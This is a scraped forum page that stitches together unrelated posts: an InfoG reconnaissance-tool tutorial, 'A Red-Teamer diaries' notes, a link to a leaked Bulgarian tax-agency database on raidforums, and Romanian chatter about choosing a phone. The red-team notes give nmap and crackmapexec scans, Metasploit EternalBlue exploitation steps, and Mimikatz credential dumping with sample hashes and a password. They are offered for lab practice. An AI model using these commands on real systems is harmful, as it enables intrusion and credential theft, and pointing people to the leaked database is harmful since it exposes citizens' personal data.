Forums

InfoG is a Shellscript used to gather information about a target. It allows the ethical hacker to gather information during the initial phases of a penetration test. The tool has many features. Some are as follows: Check Website info Check Phone info IP Tracker Check Valid E-mail Check if site is Up/Down Check internet speed Check Personal info Find IP behind Cloudflare Find Subdomains Port Scan (Multi-threaded) Check CMS Check DNS leaking Let’s Get Started! First, we need to install the tool by typing the following command: git clone https://github.com/thelinuxchoice/infog Then we change directory to infog by typing the following command: cd infog Now, we want to see the content of the directory, so we type the following command: ls Your screen should look like that: Then we run the tool by typing the following command: bash infog.sh The tool will start, and your screen should look like that: Then, we have a look at the options that are offered by the tool. You can choose any option of your choice. As a first test, we are going to check whether the website is up or down. So we type: 5 The tool will prompt us to enter the target website. You can type any website of your choice (where you are authorized to do so). In our case, we type: www.certifiedhacker.com The tool will run the test and will return the results. Your screen should look like that: The remote host is up. As shown in the above screen shot, the tool printed Site is Up ! Let’s try another test Now, we want to check the open ports of a given website. Again, we type: bash infog.sh then we select option 12 by typing: 12 After selecting the option, the tool will prompt us to enter the host. So we enter the following: www.certifiedhacker.com The tool will ask us if we want to scan a single port or a port range. We select port range, by typing the following: 2 Then, the tool will prompt us to enter the range of the ports that we would like to scan. In our case, we want to scan from port number 1 to 1000. So we type: 1-1000 Then the tool prompts us to enter the number of threads. The tool’s default is 10. So we keep it at 10 by typing the following: 10 If you successfully managed to follow the steps, your screen should look like that: Then our scan will start. And your screen should look like the following screenshots: In the above screenshots, the tool is scanning different ports, and it is flagging out the open ones as the scan progresses. At the end of the scan, the tool will give us a summary of the discovered open ports. In our case, the scanner printed the following: There are many other features and options to explore within this tool. Sursa: https://latesthackingnews.com/2019/05/13/infog-v1-0-an-open-source-information-gathering-tool/

A Red-Teamer diaries This is publicly accessible personal notes about my pentesting/red teaming experiments in a controlled environment that involve playing with various tools and techniques used by penetration testers, red teams and advanced adversaries. Project in progress Intrusion Kill Chain Mapping the Network RunFinger.py Gather information about the Domain name and windows machine running in the network bash$ cd /usr/share/Responder/tools bash$ sudo python RunFinger.py -i 192.168.1.1/24 or bash$ responder-RunFinger Nbtscan Scanning IP networks for NetBIOS name information. bash$ sudo nbtscan -v -s : 192.168.1.0/24 Crackmapexec v 4.0 Scan the network range based on the SMB information bash$ cme smb 192.168.1.1/24 Nmap scan Scan all the machine network and save the outputs . -oA options : Means output with all format -T4 : Fast scan Fast Scan bash$ nmap -p 1-65535 -sV -sS -T4 -oA output target_IP Intensive Scan (Note recommended): bash$ nmap -p 1-65535 -Pn -A -oA output target_IP Scan with enumeration of the running services version : -sC : Safe Scan -sV : Get the service version bash$ nmap -sC -sV -oA output target Angry IP scanner Download the tool from this link : Angry IP Scanner Change the preferences settings Lateral Movement and Exploiting Scanning for EternalBlue ms17-010 bash$ nmap -p445 --script smb-vuln-ms17-010 <target>/24 If the target is vulnrable the output is as following Script Output Host script results: | smb-vuln-ms17-010: | VULNERABLE: | Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010) | State: VULNERABLE | IDs: CVE:CVE-2017-0143 | Risk factor: HIGH | A critical remote code execution vulnerability exists in Microsoft SMBv1 | servers (ms17-010). | | Disclosure date: 2017-03-14 | References: | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 | https://technet.microsoft.com/en-us/library/security/ms17-010.aspx |_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/ Exploiting Eternal Blue - Metasploit Module (Windows 7 x64 only ) Note : The default Module supported by Metasploit is exploiting only windows 7 x64 bit Otherwise the target will be crashed . msf > use exploit/windows/smb/ms17_010_eternalblue msf exploit(ms17_010_eternalblue) > show targets ...targets... msf exploit(ms17_010_eternalblue) > set TARGET <target-id> msf exploit(ms17_010_eternalblue) > show options ...show and set options... msf exploit(ms17_010_eternalblue) > exploit Mimikatz - Metasploit After obtaining a meterpreter shell, we need to ensure that our session is running with SYSTEM level privileges for Mimikatz to function properly. meterpreter > getuid Server username: WINXP-E95CE571A1\Administrator meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM Reading Hashes and Passwords from Memory meterpreter > load mimikatz Loading extension mimikatz...success. meterpreter > msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials =============== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;78980 NTLM WINXP-E95CE571A1 Administrator lm{ 00000000000000000000000000000000 }, ntlm{ d6eec67681a3be111b5605849505628f } 0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 } 0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO) 0;56683 NTLM n.s. (Credentials KO) 0;999 NTLM WORKGROUP WINXP-E95CE571A1$ n.s. (Credentials KO) meterpreter > kerberos [+] Running as SYSTEM [*] Retrieving kerberos credentials kerberos credentials ==================== AuthID Package Domain User Password ------ ------- ------ ---- -------- 0;999 NTLM WORKGROUP WINXP-E95CE571A1$ 0;997 Negotiate NT AUTHORITY LOCAL SERVICE 0;56683 NTLM 0;996 Negotiate NT AUTHORITY NETWORK SERVICE 0;78980 NTLM WINXP-E95CE571A1 Administrator SuperSecretPassword meterpreter > mimikatz_command -f sekurlsa::searchPasswords [0] { Administrator ; WINXP-E95CE571A1 ; SuperSecretPassword } meterpreter > mimikatz_command -f sekurlsa::logonpasswords And many more... enjoy   Download Link : https://github.com/ihebski/A-Red-Teamer-diaries?fbclid=IwAR2QfukPc5Eev-jwMpX28e4s6tOQ4uHYGkTRWdClv2ZQVHEqT8g7BksjSMI

https://raidforums.com/Thread-Bulgarian-NRA-НАП-nap-bg-Database-Leaked-Download

Daca vrei sa ramai in ecosistemul Android cat si cel Samsung, si vrei sa faci si o oarecare economie, S10e e o alegere foarte buna, o sa vezi ca OneUI e mult mai bun decat Samsung Experience. Avand in vedere ca ai si mainile mai mici, eu zic ca S10e se potriveste si pentru ergonomie.   Daca vrei sa incerci ceva diferit, sa iei Apple, nu are rost sa iti iei generatie veche. Iar avand in vedere ca XR are ecran 720p, sa fim seriosi, mai bine iei S10e. Daca XR avea ecran 1080p era o varianta de luat in seama, dar daca nu au fost in stare sa respecte una dintre cele mai importante chestii pe care pana si telefoane de 500 de lei o respecta, minim rezolutie FHD in 2019, nu merita sa vanda, sincer. Daca iti permiti sa te intinzi, un XS ar fi bun.

Sursa: http://www.d1g1r3v.net/madskillz Ati mai gasit si alte sursa?

Voiam intr-un timp sa intru pe seria iPhone dar e nu e aceeasi chestie. Nu poti face la fel de multe lucruri ca pe un Android indiferent de ce telefon ai.  Nu te mai lua dupa toti youtuberii si toate cacaturile auzite de pe net. Poti merge intr-un magazin sa incerci telefoane la rand si cel care iti place il iei. Eu cand mi-am cumparat Note am facut-o fara a ma uita daca are defecte si chestii pe care unii le scot in fata. Mergi pe ce iti place cel mai mult.  Din partea mea iti recomand un S10 si ai sa vezi ca filmarile lui doar o camera le intrece.

eu am mana mica tocmai de asta am luat in calcul s10e/s10 simplu

Pentru filmari 4k si poze e cel mai potrivit S10/+  Eu am Note9 si inca-s multumit de pozele si filmarile pe care le scoate, mai ales bateria. Mi se pare seria Note mult mai avansata decat S. Ti-as recomanda unul dar sunt mari, parerea mea. Eu am palma foarte mare si imi permite sa il tin lejer in mana si sa pot scrie in acelasi timp.    

Salut, detin un Samsung s7 edge si a inceput sa mearga cam greu si  am decis sa il schimb. 1. Sa cumpar s10e sau s10 (plus mi se pare prea mare si inutil) 2. Sa trec la iPhone, insa bugetul imi permite maxim 8 plus (desi in reviewuri am observat ca si 7 plus e aproape identic schimbarile fiind nesemnificative) Voi ce recomandati din experienta voastra nu din auzite ca nu imi este util, deoarece si eu am tot citit reviewuri. Mentionez si ca vreau un telefon care sa ma tina 1 an jumate cel putin, nu ca dupa cateva luni sa il schimb ca merge greu (ceea ce am observant ca se plang multi cu iPhone ca dupa upgrade in loc sa mearga mai bine merge tot mai greu)   Ce fac eu cu telefonul? - facebook, WhatsApp, Instagram, skype, browsing zilnic deci sa nu moara bateria dupa 4 ore -am nevoie si de camera sa scoata pozele ok si sa pot filma cu el - legat de bateria la acest capitol nu-mi pasa ca daca trebuie sa fac poze/filmez am bateria externa cu mine

Ala cred e fratele vostru de aici :))) kfollow si celalalte 20 de nicknames